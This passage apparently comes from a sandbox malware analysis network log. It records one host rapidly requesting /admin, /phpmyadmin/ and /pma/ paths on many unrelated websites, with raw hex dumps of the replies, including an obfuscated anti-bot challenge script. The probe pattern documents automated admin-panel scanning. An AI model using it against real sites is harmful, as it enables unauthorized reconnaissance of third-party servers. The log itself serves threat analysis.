65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 Data Ascii: 53f<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]))
Feb 21, 2024 00:26:13.055288076 CET	404	IN	Data Raw: 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 21 21 30 3b 7d Data Ascii: , x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(function(){ d
Feb 21, 2024 00:26:13.055299997 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
322	192.168.2.6	62334	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.893480062 CET	168	OUT	GET /admin HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.056534052 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
323	192.168.2.6	62333	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.893481016 CET	168	OUT	GET /admin HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.057476997 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
324	192.168.2.6	62338	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.894025087 CET	168	OUT	GET /admin HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.052293062 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
325	192.168.2.6	62336	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.894660950 CET	168	OUT	GET /admin HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.057495117 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
326	192.168.2.6	62339	51.159.190.167	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.896441936 CET	178	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.057151079 CET	367	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://cabinet-orsika.fr/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
327	192.168.2.6	62446	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.902424097 CET	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.002439976 CET	224	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/PhpMyAdmin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:13.206615925 CET	224	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://blauthlaw.com/PhpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
328	192.168.2.6	62518	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.972402096 CET	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: veselcontractors.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.071646929 CET	364	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-66.ec2.internal X-Request-Id: 2e847978-13e7-4b5c-a895-a7305c309e1d Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
329	192.168.2.6	62485	64.190.63.136	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.030534983 CET	180	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.schussundtor.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.430953026 CET	1286	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:13 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_d06FjstNupxyC8v9U6QlAyMgHLsqTTw3o472GKR7dDE+RCOV8m3ZVAYISvNdoJrku1HGoiFd0PVf4w72K8dDGA== last-modified: Tue, 20 Feb 2024 23:26:13 GMT x-cache-miss-from: parking-6db66cd898-zn76h server: NginX content-encoding: gzip Data Raw: 32 42 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 57 7b 6f db 38 12 ff ff 3e 05 eb c5 1e 6e 77 2d 5b 76 12 c7 91 e3 00 ce ab 4d 93 a6 4d 9b b6 9b 2d 82 82 92 28 8b b5 44 6a 49 ca 8f fa 04 dc d7 b8 af 77 9f e4 86 94 6c 4b 7e 6d 37 06 62 89 f3 9e f9 cd 0c 7d fa e2 f2 ed c5 e3 d3 bb 2b 14 aa 38 3a 3b d5 ff 51 84 d9 b0 5f 23 ac 86 90 8f 15 b6 b0 ef 46 dc 1b 8d c8 ac ff e6 7a 32 b9 7c 78 7a 7d cb ff b8 09 c7 de fd e0 e1 ea fc fc 61 70 f9 61 32 98 7c 18 bc 3e 1f dc b3 59 f4 79 d2 1e df 3d 1d 86 1f d9 c9 c4 ee 7c 7f b8 75 c3 db f3 60 fc ed fa e3 85 f4 af 23 b7 f3 e8 3f 84 53 f7 e4 fd ef 9f 7f 4f 6f 0e d5 41 cb fb 8d 77 83 a7 b7 e3 a6 ec fe d9 ba 7b f9 6e 88 0f 2e af 5a 77 4d f5 ea e3 e1 dd d5 fd 9b 8b c1 e4 6a 30 78 e8 f7 bf fa 76 e7 fa 9b 54 f7 69 32 9d 5d 74 c7 27 1f 3b 0f d1 60 f6 66 f8 ea 4e fe f9 f8 38 39 e0 87 c7 ed 97 b7 ef 8f fd cb ab df de 5f bc fd d4 8d 0f fe f8 34 78 ba f9 30 be f7 f9 6b 31 4a 5b af 5e 72 7a ed db ef 3e 05 87 93 e3 f6 6d d7 bf 7c 39 e8 f7 21 74 82 fd b3 d3 98 28 8c bc 10 0b 49 54 bf 96 aa c0 ea d6 ce 4e 15 55 11 39 93 5e 98 4a 99 32 5f 71 d1 f0 c9 3f 99 2b 93 9e 95 7f 3d 86 54 a2 09 71 25 55 04 c1 63 c0 05 92 38 22 2f 2a 5c 65 0d e8 3d 91 3c 15 1e 91 08 33 1f dd 30 10 89 b1 a2 9c 35 4e 9b b9 c1 dc 1b 86 63 d2 af 8d 29 99 24 5c a8 1a f2 38 53 84 81 77 13 ea ab b0 ef 93 31 f5 88 65 5e ea 94 51 45 71 64 49 0f 6c f7 5b 0d bb 1e e3 29 8d d3 b8 74 92 4a 22 cc 2b 76 e1 c4 ae 55 cc f8 44 7a 82 26 da 8d 92 a5 9d d1 a1 b5 9c 68 e2 0c a2 42 01 15 52 99 c0 5c 02 0f 79 a4 46 0e 47 11 e2 01 52 21 30 af 62 d6 52 ff fb cf 7f 05 41 11 e7 23 ca 86 9a b7 81 ae 05 8f d1 90 30 22 70 84 14 4f a8 27 e1 0b c5 1c 18 41 c9 24 c4 4a 4b a2 09 4f 23 1f 91 69 42 3c a5 19 02 0a 96 43 22 48 7d c3 c3 10 4b 44 95 76 a3 81 3e c3 2b 4f 88 51 61 44 96 0a 31 18 90 04 0b 2f 2c 7c 79 01 79 8a 28 1b fd 03 15 7f 82 44 fd 1a 85 Data Ascii: 2B7W{o8>nw-[vMM-(DjIwlK~m7b}+8:;Q_#Fz2\|xz}apa2\|>Yy=\|u`#?SOoAw{n.ZwMj0xvTi2]t';`fN89_4x0k1J[^rz>m\|9!t(ITNU9^J2_q?+=Tq%Uc8"/*\e=<305Nc)$\8Sw1e^QEqdIl[)tJ"+vUDz&hBR\yFGR!0bRA#0"pO'A$JKO#iB<C"H}KDv>+OQaD1/,\|yy(D
Feb 21, 2024 00:26:13.430963993 CET	1286	IN	Data Raw: 14 d5 96 47 6a 96 40 0a 69 8c 87 a4 99 b0 e1 8a 10 0a 12 f4 6b cd 26 8d 87 0d 49 7c 9e 60 a1 63 6c 78 3c 6e 2a 12 27 11 56 44 36 23 3e e4 b2 a9 e9 5f f5 63 c3 a8 68 9e 9d 4a 35 03 30 2c 95 35 7f 7d 81 98 ce 5b 44 bf 93 86 27 25 1a 1f 37 ec 86 8d Data Ascii: Gj@ik&I\|`clx<n'VD6#>_chJ50,5}[D'%7<4BD;@Tk0fU9EaVubi)2UNhom#S3y2PHKz"%?3d5vF&qY@6c1]WS@
Feb 21, 2024 00:26:13.431513071 CET	1286	IN	Data Raw: 1c 7e 52 cc f6 c7 50 61 fd f1 30 b6 8b 6d f5 f2 ff 00 00 00 ff ff 0d 0a 33 30 45 0d 0a ac 59 4b 6f e2 30 10 fe 2b 11 12 52 ab c5 c8 04 02 21 9c f6 b4 7b d8 f3 6a af 49 ec 94 a8 10 aa 04 16 ba 88 ff be e3 b1 43 fc 0a 85 aa aa 2a 05 07 7f 9e 19 cf Data Ascii: ~RPa0m30EYKo0+R!{jICw%'[h~'EylrtW]v$bPmM_[1lH-hx#V%w`j<zp',]geujpoRZ1evG)~Q
Feb 21, 2024 00:26:13.431612968 CET	1286	IN	Data Raw: 8d f9 40 b8 bc 86 77 32 29 98 2b 6f 64 9e 89 d2 e1 41 a9 fd cd b6 43 a1 bb 51 a5 bb c1 f2 57 24 92 86 22 66 83 ef 9c 37 9d 7a 5a 0e 0d 92 77 39 5a b3 ff 1f 03 a4 ef 0b f2 ef c3 71 a4 24 2b 00 ee ae ad 00 cd 7a 02 47 0e 49 6d 86 23 c7 4c 3c 62 47 Data Ascii: @w2)+odACQW$"f7zZw9Zq$+zGIm#L<bGSepOhs%7,]in=(=yhq1,?I2QpJ(.&Gt} 9z2tCfSNMdi$=(I>n'O.]X3oBNvfhbe)L7TDB]
Feb 21, 2024 00:26:13.432420969 CET	1286	IN	Data Raw: 43 2f 58 c8 01 0d ca 96 50 e6 59 63 50 53 3d e4 7d 5b a4 97 01 81 96 81 a7 86 a3 7b c8 70 d2 67 ea cd 55 13 67 2e 27 3e b9 d2 ce 26 79 60 4d 60 bd 5a 46 18 58 b4 23 98 e4 dd f4 d5 c2 1b 70 1b b3 c5 17 44 92 64 29 8a d7 4f fa c4 a2 ba 5d b5 32 94 Data Ascii: C/XPYcPS=}[{pgUg.'>&y`M`ZFX#pDd)O]2F5#YYH!7$ 6]_w}V~,%_Ks,.)]U-VT(9/2r"_%go#6VMa(BqI7Ws6\|gJ~ks}Ehx
Feb 21, 2024 00:26:13.433357000 CET	1286	IN	Data Raw: 1f 11 ba 85 36 a4 10 da 92 77 b3 49 53 29 d1 c5 98 f6 f7 ab ab ab 8e 29 64 f2 d2 87 99 7d 9d cb c2 81 83 ce 75 bd 9b 26 11 56 58 9f 85 27 48 25 47 52 a4 f2 60 49 90 ad ec c7 df c3 92 a2 47 06 05 c8 91 a5 48 6a 64 7b 96 c4 58 4b ff ed 17 a5 2f 8e Data Ascii: 6wIS))d}u&VX'H%GR`IGHjd{XK/Ty5k(rF\S5Z&\.]9i:8n_J'Gbl&;RYmi4TE}(:VJ&fi3%awrJAYdHq`IM$EzvX9>
Feb 21, 2024 00:26:13.433526039 CET	868	IN	Data Raw: 1b c2 34 45 85 b5 aa fb 8e 91 5d de 7b d5 7d ee 9b 22 ca c4 93 a7 c6 db 86 14 85 d1 db 23 5f 45 45 b9 25 59 55 54 a7 d3 68 a4 d2 6f d2 5a 6a 8f f9 ab 21 d5 d4 c1 e6 a2 75 62 73 bc e9 38 39 eb ea e0 a3 cd 00 bf 04 72 35 47 6b 89 de ab b8 b9 02 5b Data Ascii: 4E]{}"#_EE%YUThoZj!ubs89r5Gk[!M(m_ks~42Xe#?#~Lj1pEA\|RsMZI+#6e"nXYOUOwo7aFEIl"]C}s6'\|?8 +]8

Session ID	Source IP	Source Port	Destination IP	Destination Port
330	192.168.2.6	62544	62.210.211.126	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.042941093 CET	185	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.203356981 CET	567	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://voltage-distribution.com/PhpMyAdmin/ Content-Length: 342 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://voltage-distribution.com/PhpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
331	192.168.2.6	62645	20.75.101.58	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.046686888 CET	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.151384115 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
332	192.168.2.6	62585	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.092803955 CET	167	OUT	GET /pma/ HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.274418116 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:13 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 34 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 